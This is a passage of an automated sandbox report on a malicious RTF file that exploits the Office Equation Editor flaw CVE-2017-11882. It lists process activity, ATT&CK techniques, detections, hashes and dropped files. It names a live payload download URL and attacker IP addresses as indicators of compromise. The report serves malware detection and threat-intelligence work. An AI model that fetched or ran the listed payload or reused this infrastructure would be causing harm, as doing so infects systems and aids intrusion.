    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2684Thread sleep time: -360000s >= -30000sJump to behavior
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F533D rdtsc 4_2_036F533D
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405C49
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00406873 FindFirstFileW,FindClose,4_2_00406873
    Source: C:\Users\Public\vbc.exeCode function: 4_2_0040290B FindFirstFileW,4_2_0040290B
    Source: C:\Users\Public\vbc.exeAPI call chain: ExitProcess graph end nodegraph_4-7292
    Source: C:\Users\Public\vbc.exeAPI call chain: ExitProcess graph end nodegraph_4-7448
    Source: vbc.exe, 00000004.00000002.680238431.00000000008D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
    Source: C:\Users\Public\vbc.exeCode function: 4_2_73281BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,4_2_73281BFF
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F533D rdtsc 4_2_036F533D
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F773F mov eax, dword ptr fs:[00000030h]4_2_036F773F
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F6BA6 mov eax, dword ptr fs:[00000030h]4_2_036F6BA6
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F522F mov eax, dword ptr fs:[00000030h]4_2_036F522F
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F6EAF mov eax, dword ptr fs:[00000030h]4_2_036F6EAF
    Source: C:\Users\Public\vbc.exeCode function: 4_2_036F8354 RtlAddVectoredExceptionHandler,4_2_036F8354
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
    Source: C:\Users\Public\vbc.exeCode function: 4_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_0040352D
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts1
    Native API
    Path Interception1
    Access Token Manipulation
    111
    Masquerading
    OS Credential Dumping11
    Security Software Discovery
    Remote Services1
    Archive Collected Data
    Exfiltration Over Other Network Medium1
    Encrypted Channel
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
    System Shutdown/Reboot
    Default Accounts12
    Exploitation for Client Execution
    Boot or Logon Initialization Scripts11
    Process Injection
    1
    Virtualization/Sandbox Evasion
    LSASS Memory1
    Virtualization/Sandbox Evasion
    Remote Desktop Protocol1
    Clipboard Data
    Exfiltration Over Bluetooth12
    Ingress Tool Transfer
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
    Access Token Manipulation
    Security Account Manager1
    Remote System Discovery
    SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
    Non-Application Layer Protocol
    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
    Process Injection
    NTDS2
    File and Directory Discovery
    Distributed Component Object ModelInput CaptureScheduled Transfer121
    Application Layer Protocol
    SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
    Obfuscated Files or Information
    LSA Secrets4
    System Information Discovery
    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    A3hamzfUkW.rtf50%VirustotalBrowse
    A3hamzfUkW.rtf40%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882
    A3hamzfUkW.rtf100%AviraHEUR/Rtf.Malformed
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{AEC18FB7-289C-4590-8608-E6589FAB5ACE}.tmp100%AviraEXP/CVE-2017-11882.Gen
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{AEC18FB7-289C-4590-8608-E6589FAB5ACE}.tmp100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Temp\nspDD94.tmp\System.dll0%MetadefenderBrowse
    C:\Users\user\AppData\Local\Temp\nspDD94.tmp\System.dll0%ReversingLabs
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://konutmarket.com/2022file_kLVMf0%Avira URL Cloudsafe
    http://172.245.119.43/2200/vbc.exe100%Avira URL Cloudmalware
    No contacted domains info
    NameMaliciousAntivirus DetectionReputation
    https://konutmarket.com/2022file_kLVMftrue
    • Avira URL Cloud: safe
    unknown
    http://172.245.119.43/2200/vbc.exetrue
    • Avira URL Cloud: malware
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://nsis.sf.net/NSIS_ErrorErrorvbc.exe, 00000004.00000000.415058123.000000000040A000.00000008.00000001.01000000.00000003.sdmp, vbc.exe, 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vbc.exe.2.dr, vbc[1].exe.2.drfalse
      high
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      172.245.119.43
      unknownUnited States
      36352AS-COLOCROSSINGUStrue
      Joe Sandbox Version:34.0.0 Boulder Opal
      Analysis ID:561311
      Start date:27.01.2022
      Start time:10:44:50
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 5m 47s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:A3hamzfUkW (renamed file extension from none to rtf)
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of analysed new started processes analysed:7
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal100.troj.expl.winRTF@4/12@0/1
      EGA Information:
      • Successful, ratio: 100%
      HDC Information:
      • Successful, ratio: 40.9% (good quality ratio 40.2%)
      • Quality average: 86.8%
      • Quality standard deviation: 21.2%
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 38
      • Number of non-executed functions: 57
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, svchost.exe
      • Report size getting too big, too many NtQueryAttributesFile calls found.
      TimeTypeDescription
      10:45:20API Interceptor50x Sleep call for process: EQNEDT32.EXE modified
      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      172.245.119.43VC_DRAFT PI_1110106.docxGet hashmaliciousBrowse
      • 172.245.119.43/4411/vbc.exe
      PO20210819.xlsxGet hashmaliciousBrowse
      • 172.245.119.43/d/skin.exe
      PO20210817.xlsxGet hashmaliciousBrowse
      • a.ninis.us/d/hot.exe
      PO20210723.xlsxGet hashmaliciousBrowse
      • 172.245.119.43/d/pdf.exe
      PO20210722.xlsxGet hashmaliciousBrowse
      • 172.245.119.43/d/obi.exe
      No context
      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      AS-COLOCROSSINGUSi.arm7Get hashmaliciousBrowse
      • 23.94.138.109
      i.i586Get hashmaliciousBrowse
      • 23.94.138.109
      i.i686Get hashmaliciousBrowse
      • 23.94.138.109
      i.m68kGet hashmaliciousBrowse
      • 23.94.138.109
      i.mipsGet hashmaliciousBrowse
      • 23.94.138.109
      i.mpslGet hashmaliciousBrowse
      • 23.94.138.109
      i.ppcGet hashmaliciousBrowse
      • 23.94.138.109
      i.sh4Get hashmaliciousBrowse
      • 23.94.138.109
      i.sparcGet hashmaliciousBrowse
      • 23.94.138.109
      i.x86Get hashmaliciousBrowse
      • 23.94.138.109
      Deeds Office Document Copy.xlsxGet hashmaliciousBrowse
      • 192.3.146.154
      SLT10035299.xlsxGet hashmaliciousBrowse
      • 192.3.180.39
      RFQ11054.xlsxGet hashmaliciousBrowse
      • 107.174.138.158
      ACCOUNTS STATEMENT.xlsxGet hashmaliciousBrowse
      • 192.210.219.13
      PSRSG-BPL-221221-1 JOB G225.xlsxGet hashmaliciousBrowse
      • 198.12.127.206
      Order 252022.xlsxGet hashmaliciousBrowse
      • 172.245.27.21
      lod2.xlsxGet hashmaliciousBrowse
      • 198.12.107.201
      VC_DRAFT PI_1110106.docxGet hashmaliciousBrowse
      • 172.245.119.43
      Korpze1233121337.m68kGet hashmaliciousBrowse
      • 198.23.214.117
      x86_64Get hashmaliciousBrowse
      • 198.23.214.117
      No context
      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      C:\Users\user\AppData\Local\Temp\nspDD94.tmp\System.dll7027521.xlsxGet hashmaliciousBrowse
        SdEkI4IDqd.exeGet hashmaliciousBrowse
          SdEkI4IDqd.exeGet hashmaliciousBrowse
            cP5nXH8fQI.exeGet hashmaliciousBrowse
              cP5nXH8fQI.exeGet hashmaliciousBrowse
                BL Copy.docGet hashmaliciousBrowse
                  jqkuxbwi.exeGet hashmaliciousBrowse
                    HealthSystray.exeGet hashmaliciousBrowse
                      jqkuxbwi.exeGet hashmaliciousBrowse
                        listing new.xlsxGet hashmaliciousBrowse
                          Pnportd65.exeGet hashmaliciousBrowse
                            Pnportd65.exeGet hashmaliciousBrowse
                              PO-C - 20211213-PLATE.docGet hashmaliciousBrowse
                                new.xlsxGet hashmaliciousBrowse
                                  8#Ub2e4).exeGet hashmaliciousBrowse
                                    eW8Jsngljx.exeGet hashmaliciousBrowse
                                      o4XzTr73Ut.exeGet hashmaliciousBrowse
                                        uDZovIdfEJ.exeGet hashmaliciousBrowse
                                          q6JYc6gWld.exeGet hashmaliciousBrowse
                                            fw8ex1BNek.exeGet hashmaliciousBrowse
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                              Category:downloaded
                                              Size (bytes):96040
                                              Entropy (8bit):7.527902229290847
                                              Encrypted:false
                                              SSDEEP:1536:4/T2X/jN2vxZz0DTHUpouZZbJKDvTIz0u6zPEi+ctYyNv7F3oH8k29xE+1FC56:4bG7N2kDTHUpouZZbJKDM96wi+ctYU7N
                                              MD5:6EA8ECF670ED24734A3BE72B69BC5FD9
                                              SHA1:BCEAEF2755D79AB3DACBBF98B42D28BD307DC177
                                              SHA-256:7667E9078741E3AD3B07F45A2311B4C03A283CF4A060DB8341B91999FD0E8709
                                              SHA-512:332A74A4491436FBDD502FB8AB64F7D75CFDF9232F749E5C4C243A62A4B3B4BE99EE0B57F6326B3D242719001ADA64B4F43C563C89822381E9FC0EE21294ADEE
                                              Malicious:true
                                              Reputation:low
                                              IE Cache URL:http://172.245.119.43/2200/vbc.exe
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@.................................e.....@.............................................(............b...............................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata...`...`...........................rsrc...(...........................@..@................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:Composite Document File V2 Document, Cannot read section info
                                              Category:dropped
                                              Size (bytes):6144
                                              Entropy (8bit):4.066278203683498
                                              Encrypted:false
                                              SSDEEP:48:rELQ6e/2po95pDCJtts+dUbZdfIpATAa8yW:ILRV2LYjtd2ZfkFL
                                              MD5:F53BF51BC166A2BE48E410E737EEB789
                                              SHA1:53714E90CEDDFD2C2E42FAEB98B2AB71CBAC893D
                                              SHA-256:F998A79280162E0D26BBB2DB9D8B527B7794F08DA2DC99FBF4A955A198EAC916
                                              SHA-512:5D8EC077025DB25492094FD1080E43617E9828C8113E01B75CD0124E6FAA146BB5653F64F51086F901DAFBCA7B298C869271FFEECDBD9F08D0FB7D55AEBFDC13
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Reputation:low
                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):12800
                                              Entropy (8bit):3.6284810145045947
                                              Encrypted:false
                                              SSDEEP:384:1uw7E+fxXThZ6QOauIryBDLZ2aGWGaEk79NmIZ:ka/xNZ/zWDLOk79NmIZ
                                              MD5:402EB8EC2BF553CE8D78EB64E575514B
                                              SHA1:C48E6ED0D06553CA61F8691DB4C43E16BF19830A
                                              SHA-256:E2F27A4961944E019A22A769FED41A8FD59FBAD93E4102925BAB03BAA5D66933
                                              SHA-512:7D39D995CE45FEA673A4886EB654B493403C9D95E049CE0581C7EBF8EFC9F4721CB9D5B93AC60C15B4869129DA803C56A6C351E30D2886BBA4139275C4388C2D
                                              Malicious:false
                                              Reputation:low
                                              Preview:..5.$.)...8.@.@.+.?.-.+...&...&.:.5.-.8.|.?.,.4.:.&.2.%.2...6.!.<.5.....&.#.:.6.*.'.8.[.%._.7.?.*.6.-.^.,.1.?.@.7.?...7.;.-.?...|.-.2.?.%.>...(...$._.=.-.7.).(.|.:.?.?.,.5.1.=.=.0.&.?.5.9.....=.4.<...$.,.$.[.$.?...8.?.9.?.<.~.%.|...7.~...>.=.?.`.0.4.5.$...?.7.>.9.=.~.(.%.2.>.&.*.=.7.@.3.?.+.#./.(...(.<.].=.-.;.*./.;.%._.?.|.$.<.0.1./...|.,.?.?.'.0.].?.<./.,...../...[.*.>.'.%.*.).).1.?...<.[.?.6.5.8.+.#.-.?.|.+.2./.|.<...|.~.&.7.?.-.?.].$.0.....%.>.*.<.,...-.7.~.4.;.~.^.^.0.:.:.?...?.2.?.8.^.[.3.6._.$.5.:.?.,...2.3.<.$.?.*.,.0.?.?.?.^.7.^.:.*._...'.?.-._.8.`.?...^.]...;.).#.4.?.?.%.%...9.&./.=._._.?.7.#.%.(.4./.!.].(.<.8.~...+.....#.7...`.&.?.#.?.^.9.%./.?.%.0.!.^.[.,.#.4.).5.^.@.[.=.:.......*.&.:.4.`.!.:.5.(.#.5..._.:.*.'.:.4.;.@...9.*./.1.2.,.8.!.4.%.?.&.+.+.+.>...8._.5.#.*...>.?.4.5.[.~.|.$.%.).*.@.?.&.;.(.-.4.3.'.~.>.,.?.?.9.?.6.6./.?...2.3...~.?._.2.>.@.]...~...8.?.?.>.9.?.#./.-.+.|...../.;.9.9.^.1.'.~.%.].0.#.?...<.^.?.#.?.6.+.2.:.).?.9.~.-.$.#.3.(.<.5.(.?.4.%.?.`...5.4.(.?._.'.?.
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1024
                                              Entropy (8bit):0.05390218305374581
                                              Encrypted:false
                                              SSDEEP:3:ol3lYdn:4Wn
                                              MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                              SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                              SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                              SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\Public\vbc.exe
                                              File Type:DOS executable (COM)
                                              Category:dropped
                                              Size (bytes):34332
                                              Entropy (8bit):7.58708219573477
                                              Encrypted:false
                                              SSDEEP:768:lUSXzLIauAkx7VouC8IinI5ZPop67ksKbw+iByyjjPD5:lUSXzcaQZVo5aUpIsKbw+3yjjPD5
                                              MD5:7B1F6C4EB1BA4B466940FBFF9D53CF46
                                              SHA1:CE9F0A0965B2B8442D1EBC7F760913E553C7A330
                                              SHA-256:BBBAF7A0D740E9B921663D4DDB953CE0C1854C9327EE42F5F8D5A5EFCD8166BE
                                              SHA-512:C5392F06AC5C0104BA32FA4C417378E1E6032E15461D691380F7AD4823DE0AD59114EC5CD70369262451DD38AB55F92E91296292E4EA95ED1C0BF47C644B49FE
                                              Malicious:false
                                              Reputation:low
                                              Preview:.Z_.?.u.....u.....u..........u....}.O=5p.j:5.._5i..{5...5 ...P..u...Z1..4.........9.u.W......M....v...{.;{}>.......@..k......6..L..4.....4l..q..Q...&`....S...Jc|.h_j.....UND..(.:^.4..g%+Q;ug..T..F..W....PK.Xh..y.....NXJ.8.~."1..{.....o.._...p&0......Xr.t.X..r. .<sfd..;...).<..kUkG.B.....2........./.2+.Q..a>.....d....e...c...[..8.l........#%...[.B...l.....sn7h..`R[..lS .......vt..l.?uO..._....L.%.v~..-...c.......... n...... .h..!%..\.l.!4..H...!'.Q..] .h..%.F{..-.....U[S\.u-..G.h.<c.T5s... l.hv....9M..+]..%../U..)u.L........0fT.....i.Lb....h..........X....bNf.........l...L.m...=..)|{..=.......=.m:!...=....~l.9d.7....%m.b..G-....(.P.Yy(......."..r%.d...!|l.2_r.'...<.b.l.N.J|.P......$w.P..O..../....p...l-...`_..........<....l5.V.|.pY~.Rd.Y..............W..{......?..FJ/.....!|q.<Wnw.d.T....Z.nH...h..$...h..<....!e..^......<..Rll....5p..Q.!iJ:.qQ.b.hhdxm.#8..5%..$....<..1.!d.J..@.l-...0B..;.e...G.gQ.../".....P.5&he...J.y.$.A.prEN.l-..%7..
                                              Process:C:\Users\Public\vbc.exe
                                              File Type:ASCII text, with very long lines, with no line terminators
                                              Category:dropped
                                              Size (bytes):16555
                                              Entropy (8bit):5.9518641421213605
                                              Encrypted:false
                                              SSDEEP:384:HpBOk6soHG6Nun3UPBApXPE8eMag91API7ee872UmLZ7:HmkfOG6NNyp/dn19N7U71mLZ
                                              MD5:695A2030432B3D981B012A42EDCA055A
                                              SHA1:31283CF8F970E22E7C9B6FCB811B9C1608997211
                                              SHA-256:F0568B8400FE6F4621B3E62C56B3C3AB9712DD6D30966A348EB3497ACF6B226A
                                              SHA-512:0095FE21135FCCB9C5723D583C2087FB9D9CD61CB90BB5C96E11EA76469A3744B7F068B7301F7342AF95642D18921763B250FBB9E8F16F5CC9124300E6A97C5C
                                              Malicious:false
                                              Reputation:low
                                              Preview:EMr8t0Hhq715RQjpV8l9LooUdWJgMtMf2pE83U2wsss81G5KJFLeIXMa1T93HGjNEbFfy4IRaWjctEH1I3hWG74wsJYdZXNmLTqTenvgec8qpu98Zp4XlrrAhbuVePBg5nxMeoxIojglOuJAvAZef0Nak7gm0ix8xSE70QeFJMFjJvEAWRFFFtZOYkcHhCgewp7YBE8OekOsOrcexafRG4AdZaWBz3yCE4qMP0NAcxJ4DHeCdzbc6hW8i8otpHEpw0OGDSzOwMl9VCfHuXXhaw0zVcWRcWKg1sABn5d7OrJ2xhlYvPjqrY5w7z8FN0FgE8XtOgiSbRGN0toQLHc2vjrb52VFWESFWMUHsKSZfQ4PbqkilIzeyLOvDdo44fuucajegzqku9brw7f8p9R2zFXqooBphSkPzHY6XmnyhU3WyDWzX4CroF6xRQXhjjk7OqKFaLu4ORq54CnRXdGfPhd7dzPgYFxqUkZaqo2ckBxUeh3QLr4p1ievUUewtab3AdAT2kjQDq4NVPoAQ5jJvQkApXm49qXhPrvrU2YzKVhY5ajHSj55DsIeOSI066y24ayag5YtldIsnpkasB3iqzZiXwJJSOwZVHVJGChfSumllKT835iwi6k9utWFP5wIpTCqM6CflHh1JSg5HTMqV8fq5VseXa9XzYpdeJu9OBtsanwwES7WtQoLDnmScaoIfCjrIqw61PPDM8QEGM14KrtcVF5ERKQSh6jPyKwNObsN9Ts4FbeSzqr0KnDMekc8p8tRrSRckLbRBa58jfVkjWjcQeuGU8J8gr9f2EG5bdrGEds4pfOwG1TGJcUCr6T8jH9Q82m4wdSeL3wJDr5HYJN0ESkrvn77s4vH90F55tPEmd6ZjNInCzW2BOZfhfO10qNfHa7ZhuyiWVIf05P6uzThDVcRpFtIjVTvGctBTjxS6LEiUlof2CsVigpyEGuXekSTdPsflqGf5sMzKcxKlDJc6mtYp7gIqQODeycT
                                              Process:C:\Users\Public\vbc.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):12288
                                              Entropy (8bit):5.814115788739565
                                              Encrypted:false
                                              SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                              MD5:CFF85C549D536F651D4FB8387F1976F2
                                              SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                                              SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                                              SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Joe Sandbox View:
                                              • Filename: 7027521.xlsx, Detection: malicious, Browse
                                              • Filename: SdEkI4IDqd.exe, Detection: malicious, Browse
                                              • Filename: SdEkI4IDqd.exe, Detection: malicious, Browse
                                              • Filename: cP5nXH8fQI.exe, Detection: malicious, Browse
                                              • Filename: cP5nXH8fQI.exe, Detection: malicious, Browse
                                              • Filename: BL Copy.doc, Detection: malicious, Browse
                                              • Filename: jqkuxbwi.exe, Detection: malicious, Browse
                                              • Filename: HealthSystray.exe, Detection: malicious, Browse
                                              • Filename: jqkuxbwi.exe, Detection: malicious, Browse
                                              • Filename: listing new.xlsx, Detection: malicious, Browse
                                              • Filename: Pnportd65.exe, Detection: malicious, Browse
                                              • Filename: Pnportd65.exe, Detection: malicious, Browse
                                              • Filename: PO-C - 20211213-PLATE.doc, Detection: malicious, Browse
                                              • Filename: new.xlsx, Detection: malicious, Browse
                                              • Filename: 8#Ub2e4).exe, Detection: malicious, Browse
                                              • Filename: eW8Jsngljx.exe, Detection: malicious, Browse
                                              • Filename: o4XzTr73Ut.exe, Detection: malicious, Browse
